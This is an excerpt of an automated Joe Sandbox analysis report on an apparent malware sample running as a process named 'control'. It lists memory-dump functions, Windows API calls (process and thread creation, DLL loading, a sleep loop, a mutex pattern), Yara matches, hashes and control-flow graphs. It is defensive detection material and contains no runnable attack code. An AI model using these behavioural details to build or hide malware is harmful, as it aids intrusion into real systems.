                                                          • Opcode Fuzzy Hash: dfaacb43abd7f607c34961e7dfd76b1eefe098bc599e320e4cfcff90b4d0d83d
                                                          • Instruction Fuzzy Hash: 6690026134140446F10071584414B060055CBE1306F55C515F206D554D8619DD967167
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 243 25b9080-25b90c2 call 25bbd40 248 25b90c8-25b9118 call 25bbe10 call 25aacf0 call 25b4e50 243->248 249 25b919c-25b91a2 243->249 256 25b9120-25b9131 Sleep 248->256 257 25b9133-25b9139 256->257 258 25b9196-25b919a 256->258 259 25b913b-25b9161 call 25b8ca0 257->259 260 25b9163-25b9183 257->260 258->249 258->256 261 25b9189-25b918c 259->261 260->261 262 25b9184 call 25b8eb0 260->262 261->258 262->261
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 025B9128
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 265 25b9076-25b907b 266 25b9089-25b9091 265->266 267 25b907d 265->267 269 25b9092-25b90c2 call 25bbd40 266->269 268 25b907f-25b9087 267->268 267->269 268->266 273 25b90c8-25b9118 call 25bbe10 call 25aacf0 call 25b4e50 269->273 274 25b919c-25b91a2 269->274 281 25b9120-25b9131 Sleep 273->281 282 25b9133-25b9139 281->282 283 25b9196-25b919a 281->283 284 25b913b-25b9161 call 25b8ca0 282->284 285 25b9163-25b9183 282->285 283->274 283->281 286 25b9189-25b918c 284->286 285->286 287 25b9184 call 25b8eb0 285->287 286->283 287->286
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 025B9128
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 296 25ba670-25ba6a1 call 25baf60 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,025A3AF8), ref: 025BA69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 299 25a8308-25a831f 300 25a8328-25a835a call 25bca00 call 25aacf0 call 25b4e50 299->300 301 25a8323 call 25bbe60 299->301 308 25a838e-25a8392 300->308 309 25a835c-25a836e PostThreadMessageW 300->309 301->300 310 25a838d 309->310 311 25a8370-25a838b call 25aa480 PostThreadMessageW 309->311 310->308 311->310
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 025A836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 025A838B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (rendered image only; no node list is available in text)
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 025A836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 025A838B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 524 25aacf0-25aad19 call 25bcc50 527 25aad1b-25aad1e 524->527 528 25aad1f-25aad2d call 25bd070 524->528 531 25aad2f-25aad3a call 25bd2f0 528->531 532 25aad3d-25aad4e call 25bb4a0 528->532 531->532 537 25aad50-25aad64 LdrLoadDll 532->537 538 25aad67-25aad6a 532->538 537->538
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 025AAD62
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 539 25ba6e0-25ba738 call 25baf60 CreateProcessInternalW
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 025BA734
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (node list and edges follow; the executed/not-executed colouring applies to the rendered image only)
                                                          control_flow_graph 542 25b91b0-25b91d8 call 25b4e50 545 25b91da-25b91f6 call 25bf222 CreateThread 542->545 546 25b91f7-25b91fc 542->546
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025AF050,?,?,00000000), ref: 025B91EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(025B4536,?,025B4CAF,025B4CAF,?,025B4536,?,?,?,?,?,00000000,00000000,?), ref: 025BA65D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,025AF1D2,025AF1D2,?,00000000,?,?), ref: 025BA800
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,025A8D14,?), ref: 025AF6FB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction ID: 7bd7c2a10cbd0c3f55b4387ea3dc769c3fe5b27996a90b7e595d66eb2044cf6e
                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction Fuzzy Hash: 44D05E656503093AE610AAA89C13F6632896B44B44F490064F948972C3D950F0008569
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6757e22fc6f5a50f2196917389e9a3caae4d96b91d92d6c2ab86fc957d7e2c07
                                                          • Instruction ID: 5eadb18128d441f882893ba918dc41605474c3a5104d6f15ce4daa836294c4fd
                                                          • Opcode Fuzzy Hash: 6757e22fc6f5a50f2196917389e9a3caae4d96b91d92d6c2ab86fc957d7e2c07
                                                          • Instruction Fuzzy Hash: B4B09B719015D5C9FB11F760470871779506BD0705F15C561E3038641E4738D1D5F1B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0006761A,?,?), ref: 0006869C
                                                          • HeapFree.KERNEL32(00000000,?,?,0006761A,?,?), ref: 000686A3
                                                          • memset.MSVCRT ref: 000686EF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: Heap$FreeProcessmemset
                                                          • String ID:
                                                          • API String ID: 1846762186-0
                                                          • Opcode ID: de053a9d3eb23efd5fb403868795c2873a637a044f3de3db5eaff919a7707501
                                                          • Instruction ID: 375825faae0b6b74936492638b01e880b00592f4e50410b1a0a1531a5f9ac5c2
                                                          • Opcode Fuzzy Hash: de053a9d3eb23efd5fb403868795c2873a637a044f3de3db5eaff919a7707501
                                                          • Instruction Fuzzy Hash: 0A318B75A003009FCB659F69C485A9ABBF6EF48310B14866EED4A8B712EB70E904CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.MSVCRT ref: 0006A28A
                                                          • GetProcessHeap.KERNEL32(00000000,?,000698B0,?,?,000698B0,00000001,00000000,00000000,?,?,?,?,?,000698B0,?), ref: 0006A316
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,000698B0,?,?,?,?,00000001,?), ref: 0006A31D
                                                          • GetProcessHeap.KERNEL32(00000000,000698B0,000698B0,?,?,000698B0,00000001,00000000,00000000,?,?,?,?,?,000698B0,?), ref: 0006A326
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,000698B0,?,?,?,?,00000001,?), ref: 0006A32D
                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,000698B0,?,?,?,?,?,000698B0,?,?,?), ref: 0006A4C6
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,000698B0,?,?,?,?,?,000698B0,?,?,?,?,00000001), ref: 0006A4CD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free$Allocmemset
                                                          • String ID:
                                                          • API String ID: 4078862186-0
                                                          • Opcode ID: a306bcd6dcfbdb825125c4beaa1d283acef3ed511476a63319cf5410907ee496
                                                          • Instruction ID: be718fbadbcf5d711ef7888985417395ab1a919616697713b7d472d4c61b6814
                                                          • Opcode Fuzzy Hash: a306bcd6dcfbdb825125c4beaa1d283acef3ed511476a63319cf5410907ee496
                                                          • Instruction Fuzzy Hash: EB816DB1E002159FEB14DFA9C894ABEB7F6FB49300F14812AE815EB241E774D941CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCommandLineW.KERNEL32(?,00000002), ref: 0006383A
                                                          • StrTrimW.SHLWAPI(-00000002,00061420), ref: 00063862
                                                          • memset.MSVCRT ref: 00063870
                                                          • GetStartupInfoW.KERNEL32(?), ref: 0006387C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0006388F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleInfoLineModuleStartupTrimmemset
                                                          • String ID:
                                                          • API String ID: 1556929265-0
                                                          • Opcode ID: 5e43f5a06a1cc762f51c8f58e460d92b10efbf2d862b774f12aae32e3349f886
                                                          • Instruction ID: 13307c9826bef37a6d767d85bba1ea840852a1cc86d5d04d11d030b954548ec1
                                                          • Opcode Fuzzy Hash: 5e43f5a06a1cc762f51c8f58e460d92b10efbf2d862b774f12aae32e3349f886
                                                          • Instruction Fuzzy Hash: 1701D672E003149AEB70A7518C45BEE77B69B45711F15001AFE45A3181DF649E86C6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32(00000040), ref: 00065273
                                                          • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 000652A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateCurrentMutexProcess
                                                          • String ID: Local\SM0:%d:%d:%hs
                                                          • API String ID: 3937467467-4162240545
                                                          • Opcode ID: 816af98038cc59fbcdae1af7542f2f5cc1bd1bbc014d9d8943f7abceb7db9abc
                                                          • Instruction ID: 4286c31d66283a2a664e77c7cd8155e5f774b2571312b46c0f8efecbfb967264
                                                          • Opcode Fuzzy Hash: 816af98038cc59fbcdae1af7542f2f5cc1bd1bbc014d9d8943f7abceb7db9abc
                                                          • Instruction Fuzzy Hash: 53315671D4062D9BDB20EF64DC89ADDB7BAEF14740F1045E9E50997242EBB09F848F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,_p0), ref: 00068C92
                                                          • GetLastError.KERNEL32 ref: 00068CA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastOpenSemaphore
                                                          • String ID: _p0
                                                          • API String ID: 1909229842-2437413317
                                                          • Opcode ID: fb73dcfdf7f14beb4bddf14e1147094db93e54d15db447d8fbadf63cfa46e2cb
                                                          • Instruction ID: a936288723ab8edc184d4b9df4df5baf3af3c556e90169ff5f7e46d86ff6dbe3
                                                          • Opcode Fuzzy Hash: fb73dcfdf7f14beb4bddf14e1147094db93e54d15db447d8fbadf63cfa46e2cb
                                                          • Instruction Fuzzy Hash: 5E21A5706011289BD720EF24C999AEE77B7EF54310F1082A9F80997241DE709E41CB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%